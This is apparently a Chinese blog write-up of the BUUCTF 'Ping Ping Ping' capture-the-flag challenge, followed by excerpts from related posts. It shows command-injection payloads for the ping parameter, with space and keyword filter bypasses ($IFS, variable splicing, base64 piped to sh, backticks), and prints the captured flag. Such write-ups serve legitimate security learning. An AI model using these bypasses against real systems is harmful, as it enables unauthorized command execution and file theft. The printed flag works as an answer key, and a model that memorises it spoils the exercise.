BUUCTF [web专题6] [GXYCTF2019]Ping Ping Ping

已于 2023-11-01 09:54:16 修改
阅读量180 收藏
点赞数
文章标签: 网络安全 web安全
于 2023-11-01 09:53:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yanglinchiji/article/details/134154032
版权

进入靶机,发现有提示

提示我们用url进行ping ip的操作

/?ip=0.0.0.0 | ls

发现空格被过滤掉了

(这里是我写代码保持距离的习惯所以才会有此回显,如果没有这个习惯的话会正常回显查询结果,没有关系的,后面输出flag.php的时候也会有提示空格过滤)

去掉空格

?ip=0.0.0.0|ls

成功回显

用${IFS}绕过空格过滤输出一下flag.php试试

?ip=0.0.0.0;cat${IFS}flag.php

发现{}被过滤掉了

再换成 $IFS$1试试

?ip=0.0.0.0;cat$IFS$1flag.php

发现flag也被过滤掉了

估计还有很多过滤掉的东西,先去看看index.php有无线索

确实挺多过滤的,但是基础命令没有被绕过,那就加入变量绕过过滤吧

?ip=0.0.0.0;a=g;cat$IFS$1fla$a.php

flag出现

flag{5dcb59b7-ec2c-49c1-8e1f-8eef062f05ca}

yanglin_371
关注
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5227
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
buuctf [GXYCTF2019]Ping Ping Ping学习笔记
haoxue__的博客
05-11 513
学习笔记
BUUCTF[GXYCTF2019]Ping Ping Ping
2301_78136321的博客
09-26 628
cat$IFS$1fla$a.php,发现页面没有变化,也没有被过滤。五,因为flag被过滤,需要寻找绕过方法,需要查看源代码,检查绕过规则.输入/?七,查看网络源代码,可发现flag为flag{71fc3286-23fd-4032-a67b-ee9ff4b9a06d}三,利用Linux命令cat flag.php命令进行文件查看.发现空格被过滤,进行绕过。四,全部进行实验可以发现只有$IFS$1可以绕过但同时也发现flag也被过滤。一,打开题目,发现可以进行ping操作,在/?
BUUCTFPing Ping Ping
金 帛的博客
02-20 7062
BUUCTFWP,关于一些waf的绕过
BUUCTFPing Ping Ping (命令执行绕过总结)
最新发布
徐徐徐的博客
09-05 390
{IFS}${IFS}$9 //这里$1到$9都可以$IFS$1 //这里$1到$9都可以{cat,flag.php} //用逗号实现了空格功能,需要用{}括起来%20 (space) //在shell中无法直接使用%20代替空格,但是在URL编码中可以尝试,tab同理%09 (tab)$X // \x09表示tab,也可以用\x20$X。
buuctf-Ping Ping Ping
xixihahawuwu的博客
11-23 791
看着界面,是一道命令执行题 构造payload Ls查询下 空格被过滤了 $IFSKaTeX parse error: Expected 'EOF', got '#' at position 67: …23162235934.png#̲pic_center) Fla…IFS1Y2F0IGZsYWcucGhw∣base641Y2F0IGZsYWcucGhw|base641Y2F0IGZsYWcucGhw∣base64IFS$1-d|sh ...
Buuctf (Web)Ping Ping Ping
m0_64444909的博客
04-02 2813
文章目录一.解题步骤二、命令分隔符三.常见绕过方式 一.解题步骤 (1)页面里显示/?ip=,很明显要以ping的形式传一个参数给ip,并且我们要想执行其他命令,就要用命令分隔符也就是管道符连接,命令分隔符可以用";“”|“”&"三种,本题经过尝试发现第一步查看目录过滤了|,&和空格。 这里介绍两种方式: 1.ping本地127.0.0.1 2.用||来代替127.0.0.1; (2)虽然找到了放flag的文件,但是尝试后发现都不对,这里介绍一种思路,我们可以通过查看index.php
buuctf [GXYCTF2019]Ping Ping Ping 1
weixin_45642610的博客
01-11 1881
buuctf [GXYCTF2019]Ping Ping Ping 1-刷题个人日记 小白一个,写给自己看。 进去后是这样: ctrl+u看网页源码也没什么,随便输个数据看看: 源码一样没什么。看题目提示,试试你能想到的方法,比如sql注入:输入ip=1' 不是sql注入,试完了发现是命令执行,输入 /?ip=1;ls 两个都看看,先看index.php输入: /?ip=1;cat index.php 看来过滤了空格 再输入 /?ip=1;cat$IFS$1index.php IFS在系统命令
BUUCTF-练习场-Web(5-8)
m0_62905745的博客
10-26 1566
SQL注入的解题大概步骤,以及爆表爆库查字段 绕过空格,替换字符的方法 命令执行漏洞
BUUCTF-WEB
ccfly1012的博客
11-02 3896
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF WEB writeup(持续更新)
zjnu_y3s的博客
09-24 833
BUUCTF WEB(持续更新) 1、Warmup 打开题目链接,得到一张图片,如下图: 此时先想到看这个网页的源代码,输入source.php即可得到源代码,如下图: 进入php代码审计,粗略看一下可以发现有file,所以我们要想办法得到file,首先先看与file有关的代码块: 看到中间发现需要前面创建的函数,所以我们返回去进行前面代码的审计,在白名单处能看到有两个文件,一个source.php、一个hint.php,我们先打开hint.php,可以看到如下字符: 暂时不知道是干什么用的,
BUUCTF-Ping Ping Ping
weixin_51383898的博客
10-07 363
启动靶机,页面提示可以传入的参数为ip=尝试ping一下本地IP地址尝试使用拼接符,空格(space)字符被过滤了,不得行删除空格字符获取当前目录有哪些文件,发现有flag.php和index.php尝试直接读取flag.php文件,不可行,忘记空格被过滤了绕过了空格,flag又被过滤了这时候,还有一个index.php源码文件,尝试读取查阅资料可得,preg_match()函数是PHP中用于匹配正则表达式的函数之一。该函数用来,并将结果存储在一个数组中,。
BUUCTF——ping ping ping
weixin_62248541的博客
11-28 349
BUUCTF——ping ping ping
BUUCTF】[GXYCTF2019] Ping Ping Ping 总结笔记 Writeup
algae
08-29 1万+
BUUCTF】[GXYCTF2019]Ping Ping Ping Writeup0x00 考点1、命令绕过空格方法有:2、内联执行0x01 解题1、简单变量替换,用a覆盖拼接flag2、变量ab互换传递,绕过字符串匹配,实现拼接3、内联执行4、被过滤的bash,用管道+sh替换 0x00 考点 1、命令绕过空格方法有: $IFS$1、${IFS}$1、 {IFS}、IFS 2、内联执行 内联,就是将反引号内命令的输出作为输入执行 ?ip=127.0.0.1;cat$IFS$9`ls` $IFS在Li
BUUCTFWebPing Ping Ping
qq_70434663的博客
03-02 879
首先使用ls命令查看当前路径下有那些文件,拼接符有“&”、“|”、“||”、“&&”、“;进入靶场后是一个ping的功能(命令执行漏洞),参数ip传递的内容会被当做ip地址进行网络连通性测试。绕过空格后发现过滤了flag(绕过flag),所以使用反引号``(高优先级特性)查看flag.php。绕过后我们并没有发现flag,那是因为注释的内容不会直接显示在页面中,右键查看源码就可以获取flag。接下来直接访问flag.php文件,直接访问PHP发现空格过滤了(绕过空格),所以我们使用$IFS$9来绕过空格。
BUUCTF Web [GXYCTF2019]Ping Ping Ping
热门推荐
wangyuxiang946的博客
10-28 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [GXYCTF2019]Ping Ping Ping一、题目简介二、思路分析1)多命令执行2)绕过空格3)绕过flag三、解题步骤1)查看当前目录2)查看文件内容3)flag 在注释中四、总结 一、题目简介 进入连接后是一个「ping」的功能,参数 ip 传递的内容会被当做 ip.
buuctfPing Ping Ping(命令执行)
zzqzzq11的博客
08-06 1369
buuctf
buuctf [GXYCTF2019]Ping Ping Ping
m0_63711447的博客
05-25 1392
1、打开题目环境 2、 先ping一下试试 3、直接cat flag,提示说不能有空格 4、用%09过滤空格,可能是过滤了特殊的字符 5、
BUUctf [GXYCTF2019]Ping Ping Ping
qq_61988806的博客
10-28 1259
BUUctf [GXYCTF2019]Ping Ping Ping
[GXYCTF2019]Ping Ping Ping
09-14
[GXYCTF2019]Ping Ping Ping是一道关于命令注入的题目。在提供的引用中,我们可以看到一个简单的PHP代码段,通过传递ip参数进行ping命令的执行。同时,引用中还给出了一些限制条件,如禁止使用特殊符号、空格、bash命令以及含有"flag"字符等。 根据引用中的代码,我们可以看到如果传递的ip参数满足特定的匹配条件,会输出相应的错误信息并结束程序。因此,我们需要绕过这些匹配条件来执行命令注入。 根据引用中的代码,我们可以看到在ip参数的检查中,会通过正则表达式匹配来判断是否包含特定的符号。因此,我们可以利用一些绕过技巧来绕过这些过滤条件。 最后,引用中给出了一种构造payload的方法。其中,可以通过使用简单变量替换来覆盖拼接flag。具体来说,我们可以将ip参数设置为"127.0.0.1;a=g;cat$IFS$1fla$a.php",这样就可以绕过过滤条件并执行cat命令来获取flag内容。 综上所述,***
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值